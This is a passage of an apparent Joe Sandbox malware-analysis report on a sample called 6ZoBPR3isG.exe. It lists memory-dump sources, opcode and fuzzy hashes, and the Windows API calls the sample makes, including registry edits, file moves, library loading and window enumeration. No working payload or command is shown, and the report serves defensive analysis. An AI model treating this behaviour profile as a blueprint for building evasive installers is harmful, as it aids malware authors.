                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                              • SetFilePointer.KERNELBASE(00175CFF,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer$CountTick
                                                                                                              • String ID:
                                                                                                              • API String ID: 1092082344-0
                                                                                                              • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                              • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                              • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                              • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 334405425-0
                                                                                                              • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                              • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                              • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                              • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Enum$CloseValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 397863658-0
                                                                                                              • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                              • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                              • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                              • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                              • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                              • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                              • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76133180,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 1892508949-0
                                                                                                              • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                              • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                              • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                              • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseQueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3356406503-0
                                                                                                              • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                              • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                              • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                              • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                              APIs
                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                              • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                              • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                              • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                              APIs
                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseDeleteValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 2831762973-0
                                                                                                              • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                              • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                              • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                              • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2547128583-0
                                                                                                              • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                              • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                              • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                              • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\6ZoBPR3isG.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCreate
                                                                                                              • String ID:
                                                                                                              • API String ID: 415043291-0
                                                                                                              • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                              • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                              • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                              • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1375471231-0
                                                                                                              • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                              • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                              • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                              • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                              APIs
                                                                                                              • EnumWindows.USER32(00000000), ref: 73F92B6B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 1129996299-0
                                                                                                              • Opcode ID: 87f2c647aa692e7994428f566428cfcd7090f006bb22e2fb2b1dcec2c831b0a5
                                                                                                              • Instruction ID: 6ea78e296e635364e52d00982b2cd00f1875377072fe8c41dda911b1998568ca
                                                                                                              • Opcode Fuzzy Hash: 87f2c647aa692e7994428f566428cfcd7090f006bb22e2fb2b1dcec2c831b0a5
                                                                                                              • Instruction Fuzzy Hash: 9E41A1B340020EFFFB21EF66DD91B5937A9EB443E4F324426E50ED6260D63594819B98
                                                                                                              APIs
                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileMove
